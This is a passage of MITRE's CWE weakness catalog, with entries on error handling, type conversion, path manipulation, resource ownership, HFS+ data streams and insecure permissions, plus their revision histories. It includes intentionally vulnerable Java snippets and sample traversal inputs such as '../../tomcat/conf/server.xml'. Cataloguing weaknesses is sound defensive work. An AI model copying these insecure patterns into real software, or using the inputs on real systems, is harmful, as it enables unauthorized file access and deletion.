vulnerabilities in these components. - - - - - Implementation - Handle exceptions appropriately in source code. - - - Implementation - System Configuration - Always define appropriate error pages. The application configuration should specify a default error page in order to guarantee that the application will never leak error messages to an attacker. Handling standard HTTP error codes is useful and user-friendly in addition to being a good security practice, and a good configuration will also define a last-chance error handler that catches any exception that could possibly be thrown by the application. - - - Implementation - Do not attempt to process an error or attempt to mask it. - - - Implementation - Verify return values are correct and do not supply sensitive information about the system. - - - - - In the snippet below, an unchecked runtime exception thrown from within the try block may cause the container to display its default error page (which may contain a full stack trace, among other things). - - Public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {try {...} catch (ApplicationSpecificException ase) {logger.error("Caught: " + ase.toString());}} - - - - - - J2EE Misconfiguration: Missing Error Handling - - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-03-10 - updated Name, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Common_Consequences, Description, Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated References - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - J2EE Misconfiguration: Missing Error Handling - - - - The software does not properly anticipate or handle exceptional conditions that rarely occur during normal operation of the software. - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Operation - - - - - Confidentiality - Availability - Integrity - Read Application Data - DoS: Crash, Exit, or Restart - Unexpected State - - - - - Dynamic Analysis with Manual Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Fault Injection - source code - Fault Injection - binary - - - Cost effective for partial coverage: - - - Forced Path Execution - - - - - High - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Manual Source Code Review (not inspections) - - - Cost effective for partial coverage: - - - Focused Manual Spotcheck - Focused manual analysis of source - - - - - High - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Source code Weakness Analyzer - Context-configured Source Code Weakness Analyzer - - - - - SOAR Partial - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - Formal Methods / Correct-By-Construction - - - - - High - - - - - ERR06-J - Do not throw undeclared checked exceptions - - - - - - - - - This is a high-level class that might have some overlap with other classes. It could be argued that even "normal" weaknesses such as buffer overflows involve unusual or exceptional conditions. In that sense, this might be an inherent aspect of most other weaknesses within CWE, similar to API Abuse (CWE-227) and Indicator of Poor Code Quality (CWE-398). However, this entry is currently intended to unify disparate concepts that do not have other places within the Research Concepts view (CWE-1000). - - - - CWE Content Team - MITRE - 2008-09-09 - Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0. - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-10-29 - updated Other_Notes - - - CWE Content Team - MITRE - 2010-02-16 - updated Relationships - - - CWE Content Team - MITRE - 2010-12-13 - updated Name, Relationship_Notes - - - CWE Content Team - MITRE - 2011-03-29 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors, Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Relationships, Type - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Relationships - - Failure to Handle Exceptional Conditions - - - - The software does not correctly convert an object, resource, or structure from one type to a different type. - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Other - Other - - - - - EXP05-C - Do not cast away a const qualification - - - EXP39-C - Do not access a variable through a pointer of an incompatible type - CWE More Abstract - - - INT31-C - Ensure that integer conversions do not result in lost or misinterpreted data - CWE More Abstract - - - INT36-C - Converting a pointer to integer or integer to pointer - CWE More Abstract - - - STR34-C - Cast characters to unsigned types before converting to larger integer sizes - CWE More Abstract - - - STR37-C - Arguments to character handling functions must be representable as an unsigned char - CWE More Abstract - - - SFP1 - Glitch in computation - - - ASCRM-CWE-704 - - - - - - - - CWE Content Team - MITRE - 2008-09-09 - Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0. - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - - - The software does not properly return control flow to the proper location after it has completed a task or detected an unusual condition. - - - - - - - - - Architecture and Design - - - Implementation - - - - - Other - Alter Execution Logic - Other - - - - - CVE-2014-1266 - chain: incorrect "goto" in Apple SSL product bypasses certificate validation, allowing Adversary-in-the-Middle (AITM) attack (Apple "goto fail" bug). CWE-705 (Incorrect Control Flow Scoping) -> CWE-561 (Dead Code) -> CWE-295 (Improper Certificate Validation) -> CWE-393 (Return of Wrong Status Code) -> CWE-300 (Channel Accessible by Non-Endpoint). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1266 - - - - - ENV32-C - All exit handlers must return normally - CWE More Abstract - - - ERR04-C - Choose an appropriate termination strategy - - - THI05-J - Do not use Thread.stop() to terminate threads - - - ERR04-J - Do not complete abruptly from a finally block - - - ERR05-J - Do not let checked exceptions escape from a finally block - - - EXP31-PL - Do not suppress or ignore exceptions - Imprecise - - - - - CWE Content Team - MITRE - 2008-09-09 - Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0. - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-03-29 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2014-06-23 - updated Observed_Examples - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Observed_Examples - - - - - The software uses a name or reference to access a resource, but the name/reference resolves to a resource that is outside of the intended control sphere. - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Integrity - Read Application Data - Modify Application Data - - - - - - - - - - - CWE Content Team - MITRE - 2008-09-09 - Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0. - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2009-03-10 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-02-16 - updated Relationships - - - CWE Content Team - MITRE - 2010-12-13 - updated Relationships - - - CWE Content Team - MITRE - 2011-03-29 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The product does not ensure or incorrectly ensures that structured messages or data are well-formed and that certain security properties are met before being read from an upstream component or sent to a downstream component. - - If a message is malformed, it may cause the message to be incorrectly interpreted. - Neutralization is an abstract term for any technique that ensures that input (and output) conforms with expectations and is "safe." This can be done by: - - checking that the input/output is already "safe" (e.g. validation) - transformation of the input/output to be "safe" using techniques such as filtering, encoding/decoding, escaping/unescaping, quoting/unquoting, or canonicalization - preventing the input/output from being directly provided by an attacker (e.g. "indirect selection" that maps externally-provided values to internally-controlled values) - preventing the input/output from being processed at all - - This weakness typically applies in cases where the product prepares a control message that another process must act on, such as a command or query, and malicious input that was intended as data, can enter the control plane instead. However, this weakness also applies to more general cases where there are not always control implications. - - - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Other - Other - - - - - - - - - - - - - - - - - - - - - - - - Concepts such as validation, data transformation, and neutralization are being refined, so relationships between CWE-20 and other entries such as CWE-707 may change in future versions, along with an update to the Vulnerability Theory document. - - - - CWE Content Team - MITRE - 2008-09-09 - Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0. - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2009-01-12 - updated Relationships - - - CWE Content Team - MITRE - 2009-03-10 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2009-05-27 - updated Description, Name - - - CWE Content Team - MITRE - 2009-07-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2014-02-18 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Applicable_Platforms, Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Description, Name, Relationships, Type - - - CWE Content Team - MITRE - 2020-06-25 - updated Description, Maintenance_Notes - - - CWE Content Team - MITRE - 2020-08-20 - updated Related_Attack_Patterns - - Failure to Enforce that Messages or Data are Well-Formed - Improper Enforcement of Message or Data Structure - - - - The software assigns an owner to a resource, but the owner is outside of the intended control sphere. - This may allow the resource to be manipulated by actors outside of the intended control sphere. - - - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Operation - - - - - Confidentiality - Integrity - Read Application Data - Modify Application Data - An attacker could read and modify data for which they do not have permissions to access directly. - - - - - Policy - Periodically review the privileges and their owners. - - - Testing - Use automated tools to check for privilege settings. - - - - - CVE-2007-5101 - File system sets wrong ownership and group when creating a new file. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5101 - - - CVE-2007-4238 - OS installs program with bin owner/group, allowing modification. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4238 - - - CVE-2007-1716 - Manager does not properly restore ownership of a reusable resource when a user logs out, allowing privilege escalation. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1716 - - - CVE-2005-3148 - Backup software restores symbolic links with incorrect uid/gid. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3148 - - - CVE-2005-1064 - Product changes the ownership of files that a symlink points to, instead of the symlink itself. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1064 - - - CVE-2011-1551 - Component assigns ownership of sensitive directory tree to a user account, which can be leveraged to perform privileged operations. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1551 - - - - - This overlaps verification errors, permissions, and privileges. - A closely related weakness is the incorrect assignment of groups to a resource. It is not clear whether it would fall under this entry or require a different entry. - - - - - CWE Content Team - MITRE - 2008-09-09 - Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0. - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-05-27 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Maintenance_Notes, Other_Notes - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Observed_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - This entry has been deprecated as it represents a specific observed example of a UNIX Hard Link weakness type rather than its own individual weakness type. Please refer to CWE-62. - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Maintenance_Notes - - - CWE Content Team - MITRE - 2009-03-10 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Common_Consequences, Description, Maintenance_Notes, Name, Observed_Examples, Relationships, Research_Gaps, Time_of_Introduction, Type - - - CWE Content Team - MITRE - 2021-03-15 - updated Taxonomy_Mappings - - Apple '.DS_Store' - - - - The software does not follow certain coding rules for development, which can lead to resultant weaknesses or increase the severity of the associated vulnerabilities. - - - - - - - Architecture and Design - - - Implementation - - - - - Other - Other - - - - - Implementation - Document and closely follow coding standards. - - - Testing - Implementation - Where possible, use automated tools to enforce the standards. - - - - - CWE Content Team - MITRE - 2008-09-09 - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-02-21 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Name, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Relationships, Type - - Coding Standards Violation - - - - The software does not properly handle special paths that may identify the data or resource fork of a file on the HFS+ file system. - If the software chooses actions to take based on the file name, then if an attacker provides the data or resource fork, the software may take unexpected actions. Further, if the software intends to restrict access to a file, then an attacker might still be able to bypass intended access restrictions by requesting the data or resource fork for that file. - - - - - - - - - - The Apple HFS+ file system permits files to have multiple data input streams, accessible through special paths. The Mac OS X operating system provides a way to access the different data input streams through special paths and as an extended attribute: - - - Resource fork: file/..namedfork/rsrc, file/rsrc (deprecated), xattr:com.apple.ResourceFork - - Data fork: file/..namedfork/data (only versions prior to Mac OS X v10.5) - - Additionally, on filesystems that lack native support for multiple streams, the resource fork and file metadata may be stored in a file with "._" prepended to the name. - Forks can also be accessed through non-portable APIs. - Forks inherit the file system access controls of the file they belong to. - Programs need to control access to these paths, if the processing of a file system object is dependent on the structure of its path. - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Integrity - Read Files or Directories - Modify Files or Directories - - - - - A web server that interprets FILE.cgi as processing instructions could disclose the source code for FILE.cgi by requesting FILE.cgi/..namedfork/data. This might occur because the web server invokes the default handler which may return the contents of the file. - - - - - CVE-2004-1084 - Server allows remote attackers to read files and resource fork content via HTTP requests to certain special file names related to multiple data streams in HFS+. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1084 - - - - - - - This and similar problems exist because the same resource can have multiple identifiers that dictate which behavior can be performed on the resource. - Under-studied - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - David Remahl - Apple - 2008-11-05 - clarified description, provided background details, and added demonstrative example - - - CWE Content Team - MITRE - 2008-11-24 - updated Applicable_Platforms, Background_Details, Demonstrative_Examples, Description, Name, References - - - CWE Content Team - MITRE - 2009-05-27 - updated Name - - - CWE Content Team - MITRE - 2009-10-29 - updated Other_Notes, Theoretical_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Apple HFS+ Alternate Data Stream - Failure to Handle Apple HFS+ Alternate Data Stream Path - - - - The software allows user input to control or influence paths or file names that are used in filesystem operations. - - This could allow an attacker to access or modify system files or other files that are critical to the application. - Path manipulation errors occur when the following two conditions are met: - - 1. An attacker can specify a path used in an operation on the filesystem. - 2. By specifying the resource, the attacker gains a capability that would not otherwise be permitted. - - For example, the program may give the attacker the ability to overwrite the specified file or run with a configuration controlled by the attacker. - - - - - - - - - - - - - - Primary - - - - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - High - - - Integrity - Confidentiality - Read Files or Directories - Modify Files or Directories - The application can operate on unexpected files. Confidentiality is violated when the targeted filename is not directly readable by the attacker. - - - Integrity - Confidentiality - Availability - Modify Files or Directories - Execute Unauthorized Code or Commands - The application can operate on unexpected files. This may violate integrity if the filename is written to, or if the filename is for a program or other form of executable code. - - - Availability - DoS: Crash, Exit, or Restart - DoS: Resource Consumption (Other) - The application can operate on unexpected files. Availability can be violated if the attacker specifies an unexpected file that the application modifies. Availability can also be affected if the attacker specifies a filename for a large file, or points to a special device or a file that does not have the format that the application expects. - - - - - Automated Static Analysis - - The external control or influence of filenames can often be detected using automated static analysis that models data flow within the software. - Automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or require any code changes. - - - - - - Architecture and Design - When the set of filenames is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames, and reject all other inputs. For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap provide this capability. - - - Architecture and Design - Operation - - Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict all access to files within a particular directory. - Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection. - This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise. - Be careful to avoid CWE-243 and other weaknesses related to jails. - - - - Architecture and Design - For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. - Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. - - High - - - Implementation - Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes ".." sequences and symbolic links (CWE-23, CWE-59). - - - Installation - Operation - Use OS-level permissions and run as a low-privileged user to limit the scope of any successful attack. - - - Operation - Implementation - If you are using PHP, configure your application so that it does not use register_globals. During implementation, develop your application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues. - - - Testing - Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible. - - - Testing - Use dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results. - - - Testing - Use tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. - - - - - The following code uses input from an HTTP request to create a file name. The programmer has not considered the possibility that an attacker could provide a file name such as "../../tomcat/conf/server.xml", which causes the application to delete one of its own configuration files (CWE-22). - - String rName = request.getParameter("reportName");File rFile = new File("/usr/local/apfr/reports/" + rName);...rFile.delete(); - - - - The following code uses input from a configuration file to determine which file to open and echo back to the user. If the program runs with privileges and malicious users can change the configuration file, they can use the program to read any file on the system that ends with the extension .txt. - - fis = new FileInputStream(cfg.getProperty("sub")+".txt");amt = fis.read(arr);out.println(arr); - - - - - - CVE-2008-5748 - Chain: external control of values for user's desired language and theme enables path traversal. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5748 - - - CVE-2008-5764 - Chain: external control of user's target language enables remote file inclusion. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5764 - - - - - Path Manipulation - - - SFP16 - Path Traversal - - - - - - - - - - - - - - - - - - CWE-114 is a Class, but it is listed a child of CWE-73 in view 1000. This suggests some abstraction problems that should be resolved in future versions. - - The external control of filenames can be the primary link in chains with other file-related weaknesses, as seen in the CanPrecede relationships. This is because software systems use files for many different purposes: to execute programs, load code libraries, to store application data, to store configuration settings, record temporary data, act as signals or semaphores to other processes, etc. - However, those weaknesses do not always require external control. For example, link-following weaknesses (CWE-59) often involve pathnames that are not controllable by the attacker at all. - The external control can be resultant from other issues. For example, in PHP applications, the register_globals setting can allow an attacker to modify variables that the programmer thought were immutable, enabling file inclusion (CWE-98) and path traversal (CWE-22). Operating with excessive privileges (CWE-250) might allow an attacker to specify an input filename that is not directly readable by the attacker, but is accessible to the privileged program. A buffer overflow (CWE-119) might give an attacker control over nearby memory locations that are related to pathnames, but were not directly modifiable by the attacker. - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-01-12 - updated Applicable_Platforms, Causal_Nature, Common_Consequences, Demonstrative_Examples, Description, Observed_Examples, Other_Notes, Potential_Mitigations, References, Relationship_Notes, Relationships, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-03-10 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2009-07-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences, Description - - - CWE Content Team - MITRE - 2009-12-28 - updated Detection_Factors - - - CWE Content Team - MITRE - 2010-02-16 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Likelihood_of_Exploit, Modes_of_Introduction, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, References, Relationships, Time_of_Introduction, Type - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Maintenance_Notes, Potential_Mitigations - - Path Manipulation - - - - The product specifies permissions for a security-critical resource in a way that allows that resource to be read or modified by unintended actors. - When a resource is given a permissions setting that provides access to a wider range of actors than required, it could lead to the exposure of sensitive information, or the modification of that resource by unintended parties. This is especially dangerous when the resource is related to program configuration, execution or sensitive user data. - - - - - - - - - - - Architecture and Design - - - Implementation - - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - The developer might make certain assumptions about the environment in which the product operates - e.g., that the software is running on a single-user system, or the software is only accessible to trusted administrators. When the software is running in a different environment, the permissions become a problem. - - - - Installation - The developer may set loose permissions in order to minimize problems when the user first runs the program, then create documentation stating that permissions should be tightened. Since system administrators and users do not always read the documentation, this can result in insecure permissions being left unchanged. - - - Operation - - - High - - - Confidentiality - Read Application Data - Read Files or Directories - An attacker may be able to read sensitive information from the associated resource, such as credentials or configuration information stored in a file. - - - Access Control - Gain Privileges or Assume Identity - An attacker may be able to modify critical properties of the associated resource to gain privileges, such as replacing a world-writable executable with a Trojan horse. - - - Integrity - Other - Modify Application Data - Other - An attacker may be able to destroy or corrupt critical data in the associated resource, such as deletion of records from a database. - - - - - Automated Static Analysis - - Automated static analysis may be effective in detecting permission problems for system resources such as files, directories, shared memory, device interfaces, etc. Automated techniques may be able to detect the use of library functions that modify permissions, then analyze function calls for arguments that contain potentially insecure values. - However, since the software's intended security policy might allow loose permissions for certain operations (such as publishing a file on a web server), automated static analysis may produce some false positives - i.e., warnings that do not have any security consequences or require any code changes. - When custom permissions models are used - such as defining who can read messages in a particular forum in a bulletin board system - these can be difficult to detect using automated static analysis. It may be possible to define custom signatures that identify any custom functions that implement the permission checks and assignments. - - - - Automated Dynamic Analysis - - Automated dynamic analysis may be effective in detecting permission problems for system resources such as files, directories, shared memory, device interfaces, etc. - However, since the software's intended security policy might allow loose permissions for certain operations (such as publishing a file on a web server), automated dynamic analysis may produce some false positives - i.e., warnings that do not have any security consequences or require any code changes. - When custom permissions models are used - such as defining who can read messages in a particular forum in a bulletin board system - these can be difficult to detect using automated dynamic analysis. It may be possible to define custom signatures that identify any custom functions that implement the permission checks and assignments. - - - - Manual Analysis - This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an 